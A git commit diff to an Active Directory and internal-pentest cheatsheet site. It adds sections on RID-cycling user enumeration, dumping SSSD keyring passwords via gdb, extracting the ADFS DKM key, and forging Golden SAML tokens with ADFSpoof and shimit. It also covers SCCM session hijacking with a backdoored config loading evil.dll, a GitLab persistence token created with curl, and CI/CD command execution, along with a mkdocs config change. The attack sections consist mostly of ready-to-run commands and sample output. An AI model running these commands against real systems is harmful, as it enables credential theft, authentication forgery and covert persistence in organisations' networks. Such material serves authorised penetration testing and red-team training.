RID Cycling + SSSD keyring + SCCM persistence + Mkdocs config update

pull/11/head
Swissky 2024-04-22 14:51:51 +02:00
parent a7391ccef1
commit 35c34b8313
8 changed files with 276 additions and 42 deletions

View File

@ -303,6 +303,27 @@ You can remotely query every machines on the network to get a list of the users'
```
## RID cycling
Enumerate users from the Domain Controllers.
* Using `netexec`
```ps1
netexec smb 10.10.11.231 -u guest -p '' --rid-brute
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser)
SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser)
```
* Using Impacket script [lookupsid.py](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```ps1
lookupsid.py -no-pass 'guest@rebound.htb' 20000
```
## Other Interesting Commands
- **Find Domain Controllers**

View File

@ -40,7 +40,7 @@ make CONF=Release
## CCACHE ticket reuse from SSSD KCM
SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`.
System Security Services Daemon (SSSD) maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`.
The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`.
By default, the key is only readable if you have **root** permissions.
@ -130,7 +130,53 @@ De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_
```
## Extract accounts from SSSD keyring
**Requirements**:
* `krb5_store_password_if_offline = True` in `/etc/sssd/sssd.conf`
**Exploit**:
When `krb5_store_password_if_offline` is enabled, the AD password is stored plaintext.
```ps1
[domain/domain.local]
cache_credentials = True
ipa_domain = domain.local
id_provider = ipa
auth_provider = ipa
access_provider = ipa
chpass_provider = ipa
ipa_server = _srv_, server.domain.local
krb5_store_password_if_offline = true
```
Grab the PID of the SSSD process and hook it in `gdb`. Then list the process keyrings.
```ps1
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```
From the `/tmp/output` locate the `key_id` for the user you want.
```ps1
Session Keyring
237034099 --alswrv 0 0 keyring: _ses
689325199 --alswrv 0 0 \_ user: user@domain.local
```
Back to GDB:
```ps1
call system("keyctl print 689325199 > /tmp/output")
```
## References
* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html)
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
* [20.4. Caching Kerberos Passwords - Red Hat Customer Portal](https://access.redhat.com/documentation/fr-fr/red_hat_enterprise_linux/6/html/identity_management_guide/kerberos-pwd-cache)

View File

@ -1,7 +1,37 @@
# Active Directory - Federation Services
Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network.
## ADFS - DKM Master Key
* The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object.
```ps1
$key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto
[System.BitConverter]::ToString($key)
```
## ADFS - Trust Relationship
Gets the relying party trusts of the Federation Service.
* Search for `IssuanceAuthorizationRules`
```ps1
Get-AdfsRelyingPartyTrust
```
## ADFS - Golden SAML
Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system.
* Golden SAML are effective even when 2FA is enabled.
* The token-signing private key is not renewed automatically
* Changing a users password won't affect the generated SAML
**Requirements**:
* ADFS service account
@ -9,7 +39,7 @@
**Exploitation**:
* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query`
* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query`
* Convert PFX and Private Key to binary format
```ps1
# For the pfx
@ -17,6 +47,7 @@
# For the private key
echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin
```
* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof).
```ps1
mkdir ADFSpoofTools
@ -36,11 +67,64 @@
/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
```
**Manual Exploitation**:
* Retrieve the WID path: `Get-AdfsProperties`
* Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust`
* Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin`
```powershell
$cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings"
$client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString);
$client.Open();
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT name FROM sys.databases"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$name = $reader.GetString(0)
$reader.Close()
Write-Output $name;
```
* Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory:
```ps1
ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto
```
* Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key`
* Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML
NOTE: There might be multiple master keys in the container, remember to try them all.
**Golden SAML Examples**
* SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions`
```ps1
python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls
/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
```
* Office365: requires `--upn` and `--objectguid`
```ps1
python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1
```
* Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format.
**NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server.
Other interesting tools to exploit AD FS:
* [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction.
* [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack
```ps1
python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED
```
## References
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
* [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html)
* [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs)
* [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
* [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/)

View File

@ -1,12 +1,11 @@
# Deployment - SCCM
## Application Deployment
## SCCM Application Deployment
> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Using **SharpSCCM**
```ps1
@ -75,7 +74,10 @@
```
## Configuration Manager
## SCCM Configuration Manager
* [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://raw.githubusercontent.com/subat0mik/Misconfiguration-Manager/main/MisconfigurationManager.ps1)
### CRED-1 Retrieve credentials via PXE boot media
@ -214,6 +216,25 @@ From a remote machine.
```
## SCCM Persistence
* [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.
CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.
* Backdoor the `SCNotification.exe.config` to load your DLL
```ps1
python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config
```
* Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share
```ps1
python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10
```
## References
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
@ -223,3 +244,8 @@ From a remote machine.
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)
* [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en)
* [SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/)
* [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/)
* [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/)
* [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/)

View File

@ -1,7 +1,8 @@
# Application Escape and Breakout
# Kiosk Escape and Jail Breakout
## Summary
* [Methodology](#methodology)
* [Gaining a command shell](#gaining-a-command-shell)
* [Sticky Keys](#sticky-keys)
* [Dialog Boxes](#dialog-boxes)
@ -21,6 +22,19 @@
* [kiosk.vsim.xyz](https://kiosk.vsim.xyz/) - tooling for browser-based, Kiosk mode testing.
## Methodology
- Display global variables and their permissions: `export -p`
- Switch to another user using `sudo`/`su`
- Basic privilege escalations such as CVE, sudo misconfiguration, etc. Comprehensive list at [Linux](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/) / [Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/)
- List default commands in the restricted shell: `compgen -c`
- Container escape if it's running inside a `Docker`/`LXC` container
- Pivot onto the network
- Scan other machines on the network or attempt SSRF exploitation
- Metadata for Cloud assets, see `cloud/aws` and `cloud/azure`
- Use globbing capability built inside the shell: `echo *`, `echo .*`, `echo /*`
## Gaining a command shell
* **Shortcut**
@ -106,6 +120,7 @@ Enter *.* or *.exe or similar in `File name` box
* Print menus
* All other menus that provide dialog boxes
### Accessing filesystem
Enter these paths in the address bar:
@ -115,6 +130,7 @@ Enter these paths in the address bar:
* %HOMEDRIVE%
* \\127.0.0.1\c$\Windows\System32
### Unassociated Protocols
It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`.
@ -143,6 +159,14 @@ firefox irc://127.0.0.1 -P "Test"
## Shell URI Handlers
A URI (Uniform Resource Identifier) handler is a software component that enables a web browser or operating system to pass a URI to an appropriate application for further handling.
For example, when you click on a "mailto:" link in a webpage, your device knows to open your default email application. This is because the "mailto:" URI scheme is registered to be handled by an email application. Similarly, "http:" and "https:" URIs are typically handled by a web browser.
In essence, URI handlers provide a bridge between web content and desktop applications, allowing for a seamless user experience when navigating between different types of resources.
The following URI handlers might trigger application on the machine:
* shell:DocumentsLibrary
* shell:Librariesshell:UserProfiles
* shell:Personal

View File

@ -1,14 +1,6 @@
# Source Code Management & CI/CD Compromise
>
## Summary
* [Tools](#tools)
* [Enumerate repositories files and secrets](#enumerate-repositories-files-and-secrets)
* [Personal Access Token](#personal-access-token)
* [Gitlab CI/Github Actions](#gitlab-cigithub-actions)
* [References](#references)
> CI/CD is a method to frequently deliver apps to customers by introducing automation into the stages of app development. The main concepts attributed to CI/CD are continuous integration, continuous delivery, and continuous deployment. Compromises in CI/CD can occur through unauthorized access, misconfiguration, dependency vulnerabilities, insecure secrets, and lack of visibility.
## Tools
@ -51,17 +43,24 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
```
* Get the assigned privileges to an access token being used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
```
* Promote a normal user to an administrative role in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
```
* Create/List/Delete an access token to be used in a particular SCM system
## Personal Access Token
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
* Manual
```ps1
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
```
* Using `SCMKit.exe`: Create/List/Delete an access token to be used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
@ -69,6 +68,14 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce
SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
```
* Get the assigned privileges to an access token being used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
```
## SSH Keys
* Create/List an SSH key to be used in a particular SCM system
```ps1
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
@ -79,15 +86,8 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce
SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
```
## Personal Access Token
Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
```ps1
curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
```
## Gitlab CI/Github Actions
## Gitlab CI
* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml`
```yaml
@ -107,6 +107,22 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers
tags:
- ${RUNNER}
```
### Gitlab Executors
* **Shell** executor: The jobs are run with the permissions of the GitLab Runners user and can steal code from other projects that are run on this server.
* **Docker** executor: Docker can be considered safe when running in non-privileged mode.
* **SSH** executor: SSH executors are susceptible to MITM attack (man-in-the-middle), because of missing `StrictHostKeyChecking` option.
### Gitlab CI/CD variables
CI/CD Variables are a convenient way to store and use data in a CI/CD pipeline, but variables are less secure than secrets management providers
## Github Actions
* Github Action "Command Execution" example: `.github/workflows/example.yml`
```yml
name: example
@ -127,7 +143,10 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers
whoami
```
## References
* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/)
* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html)
* [Security for self-managed runners - Gitlab](https://docs.gitlab.com/runner/security/)
* [Fixing Typos and Breaching Microsofts Perimeter - John Stawinski IV - April 15, 2024](https://johnstawinski.com/2024/04/15/fixing-typos-and-breaching-microsofts-perimeter/)

View File

@ -344,12 +344,18 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
## SSH Protocol
:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!)
:warning: You cannot pass the hash to SSH
```ps1
cp user.ccache /tmp/krb5cc_1045
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
```
* Connect using username/password of a Domain User
```ps1
ssh -l user@domain 192.168.1.1
```
* Connect with a Kerberos ticket
```ps1
cp user.ccache /tmp/krb5cc_1045
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
```
## Other methods

View File

@ -2,8 +2,13 @@ site_name: Internal All The Things
site_description: 'Active Directory and Internal Pentest Cheatsheets'
site_url: https://swisskyrepo.github.io/InternalAllTheThings
repo_url: https://github.com/swisskyrepo/InternalAllTheThings
edit_uri: blob/main/docs/
theme:
name: material
color_mode: auto
user_color_mode_toggle: true
icon:
repo: fontawesome/brands/github
palette:
@ -23,8 +28,13 @@ theme:
features:
- content.code.copy
- content.action.edit
- content.action.view
- content.tooltips
- navigation.tracking
- navigation.top
- search.share
- search.suggest
extra_css:
- custom.css
@ -46,8 +56,6 @@ markdown_extensions:
emoji_index: !!python/name:material.extensions.emoji.twemoji
emoji_generator: !!python/name:material.extensions.emoji.to_svg
repo_url: https://github.com/swisskyrepo/InternalAllTheThings/
edit_uri: edit/master/
plugins:
- search
- git-revision-date-localized